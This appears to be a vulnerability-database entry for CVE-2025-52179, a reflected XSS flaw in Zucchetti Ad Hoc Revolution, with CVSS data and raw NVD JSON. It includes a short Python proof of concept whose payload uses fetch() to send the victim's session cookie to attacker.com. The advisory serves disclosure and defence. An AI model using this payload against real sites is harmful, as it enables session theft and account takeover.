Security Vulnerability Report
中文
CVE-2025-52179 CVSS 6.1 MEDIUM

CVE-2025-52179

Published: 2025-10-30 19:16:27
Last Modified: 2026-04-15 00:35:42

Description

Cross-site scripting (XSS) vulnerability in Zucchetti Ad Hoc Revolution 4.1 and earlier allows remote unauthenticated attackers to inject arbitrary JavaScript via the pHtmlSource parameter of the /ahrw/jsp/gsfr_feditorHTML.jsp endpoint.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Zucchetti Ad Hoc Revolution <= 4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-52179 PoC - XSS in Zucchetti Ad Hoc Revolution # Target: /ahrw/jsp/gsfr_feditorHTML.jsp # Parameter: pHtmlSource target_url = "http://target-server/ahrw/jsp/gsfr_feditorHTML.jsp" # XSS payload - steals session cookie xss_payload = "<script>fetch('https://attacker.com/log?c='+document.cookie)</script>" params = { "pHtmlSource": xss_payload } print("[*] Sending XSS payload to target...") print(f"[*] Target: {target_url}") print(f"[*] Payload: {xss_payload}") try: response = requests.get(target_url, params=params, timeout=10) print(f"[*] Response Status: {response.status_code}") if xss_payload in response.text: print("[+] Payload reflected in response - XSS vulnerability confirmed") else: print("[-] Payload not found in response") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52179", "sourceIdentifier": "[email protected]", "published": "2025-10-30T19:16:27.297", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability in Zucchetti Ad Hoc Revolution 4.1 and earlier allows remote unauthenticated attackers to inject arbitrary JavaScript via the pHtmlSource parameter of the /ahrw/jsp/gsfr_feditorHTML.jsp endpoint."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://gist.github.com/alex-xor/8d0f9f456e6840a955889305ea789ef8", "source": "[email protected]"}, {"url": "https://www.zucchetti.it/", "source": "[email protected]"}]}}